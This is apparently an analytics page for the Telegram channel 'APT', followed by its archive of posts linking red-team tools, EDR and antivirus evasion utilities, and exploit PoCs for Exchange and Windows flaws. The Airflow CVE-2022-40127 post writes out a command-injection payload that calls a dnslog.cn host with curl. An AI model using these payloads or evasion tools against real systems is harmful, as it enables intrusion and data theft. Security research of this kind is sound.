APT

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

📈 Analytical overview of Telegram channel APT

Channel APT (@apt_notes) in the English language segment is an active participant. Currently, the community unites 14 653 subscribers, ranking 8 841 in the Technologies & Applications category and 45 663 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on an unknown date, the project has demonstrated rapid growth, gathering an audience of 14 653 subscribers.

According to the latest data from 11 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 406 over the last 30 days and by 16 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 48.83%. Within the first 24 hours after publication, content typically collects N/A% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 7 154 views. Within the first day, a publication typically gains 0 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 18.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Thanks to the high frequency of updates (latest data received on 12 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

14 653 subscribers: +16 in 24 hours, +108 in 7 days, +406 in 30 days
Posts Archive
APT
14 658
⚙️ Meterpreter BOFLoader In this guide, you'll learn how the new BOFLoader extension allows BOFs to be used from a Meterpreter session. Discover new attacks made possible in Meterpreter and avoid common errors. https://www.trustedsec.com/blog/operators-guide-to-the-meterpreter-bofloader #msf #meterpreter #bof #loader

Repost from 1N73LL1G3NC3
Inline-Execute-PE is a CobaltStrike toolkit enabling users to load and repeatedly run unmanaged Windows EXEs in Beacon memory without dropping to disk or creating a new process each time.

😈 Microsoft Exchange: OWASSRF + TabShell (CVE-2022-41076) The TabShell vulnerability is a form of Privilege Escalation which allows breaking out of the restricted PowerShell Sandbox after you have successfully gained access through OWASSRF. For a detailed write-up, see the research: https://blog.viettelcybersecurity.com/tabshell-owassrf/ PoC: https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e #owa #ssrf #tabshell #poc

Happy New Year! Happy holiday to you, dear friends and subscribers of my channel! This year has brought a lot of trouble and a lot of joyful moments. In the new year, I wish you more vulnerabilities found, interesting research and all the best. Thank you for all the support, feedback, and messages this year! Love you all ♥️

Repost from Offensive Xwitter
👹 [ snovvcrash, sn🥶vvcr💥sh ] Rewritten #DirtyVanity PoC injector to C# and #DInvoke. Great stuff @eliran_nissan! https://t.co/ifQLPMSFpb Happy upcoming New Year to everyone! 🎄 🔗 https://gist.github.com/snovvcrash/09deab831d49028e194e8ee83f2616a9

🔑 Pass-the-Challenge This blog post introduces new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised. Research: https://research.ifcr.dk/pass-the-challenge-defeating-windows-defender-credential-guard-31a892eee22 Source: https://github.com/ly4k/PassTheChallenge #ad #windows #ntlm #challenge

Happy Christmas to everyone!

🎲 PowerShell Obfuscation A simple and effective PowerShell obfuscation tool to bypass Anti-Virus, with AMSI-bypass + ETW-block. https://github.com/H4de5-7/powershell-obfuscation #powershell #obfuscation #amsi #etw #bypass

👾 Windows Drivers Reverse Engineering Methodology This blog post details a methodology for reverse engineering and finding vulnerable code paths in Windows drivers. Including a guide for setting up a lab for (the pesky) kernel debugging. https://voidsec.com/windows-drivers-reverse-engineering-methodology/ #reverse #driver #analysis

💥 Shellcode Mutator New tool to help red teamers avoid detection. Shellcode is a small piece of code that is typically used as the payload in an exploit, and can often be detected by its “signature”, or unique pattern. Shellcode Mutator mutates exploit source code without affecting its functionality, changing its signature and making it harder to reliably detect as malicious. Research: https://labs.nettitude.com/blog/shellcode-source-mutations/ Source: https://github.com/nettitude/ShellcodeMutator #shellcode #mutator #nasm #redteam

😈 OWASSRF — New Exploit Method for Exchange Bypassing ProxyNotShell Mitigations CrowdStrike recently discovered a new exploit method using CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access. https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/ #owa #exchange #ssrf #proxynotshell

Repost from internet-lab.ru
🔐 MULTIFACTOR — 2FA specifics There is a decent solution for setting up two-factor authentication in a corporate environment called MULTIFACTOR. It is listed in the Russian software registry under number 7046. This is not an advertisement, because today we will tell you, in just a couple of words, how this second factor can be bypassed in some very specific cases. Mwa-ha-ha. #security #special https://internet-lab.ru/multifactor_2fa_bug

💉 Dirty Vanity — A New Approach to Code injection & EDR bypass A POC for the new injection technique, abusing the Windows fork API to evade EDRs. Source: https://github.com/deepinstinct/Dirty-Vanity Research: https://i.blackhat.com/EU-22/Thursday-Briefings/EU-22-Nissan-DirtyVanity.pdf #av #edr #bypass #injection #fork #api

⚔️ DirCreate2System Weaponizing to get NT AUTHORITY\SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting https://github.com/binderlabs/DirCreate2System #windows #privesc #directory #error #report

⚔️ Mangle — EDR Bypass This is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners. https://github.com/optiv/Mangle #edr #bypass #inflate #certificate

🎁 HackTheBox — ProLab Discount HackTheBox is running a huge pro-lab discount this month. Use coupon code: "weloveprolabs22" and waive the setup fee ($95) of any pro lab. Each pro lab is $27/m, which makes this over 75% off. The coupon expires at the end of the year. #hackthebox #prolab #discount

A fairly interesting analysis using Avast as an example. Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass https://the-deniss.github.io/posts/2022/12/08/hooking-system-calls-in-windows-11-22h2-like-avast-antivirus.html #research #redteam

💨 Apache Airflow RCE Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands. PoC: 1. Active example_bash_operator at DAGs 2. Run ID parameter {"test":"\";curl `id -u`.xxx.dnslog.cn;\""} #apache #airflow #dags #rce

💣 ProxyNotShell PoC ProxyNotShell is a new exploit used in the wild that takes advantage of the recently published Microsoft Server-Side Request Forgery vulnerability (CVE-2022-41040) and a second vulnerability that allows Remote Code Execution (CVE-2022-41082) when PowerShell is available on the Exchange Server. Research: https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend Nmap Checker: https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse PoC: https://github.com/testanull/ProxyNotShell-PoC #exchange #proxynotshell #ssrf #rce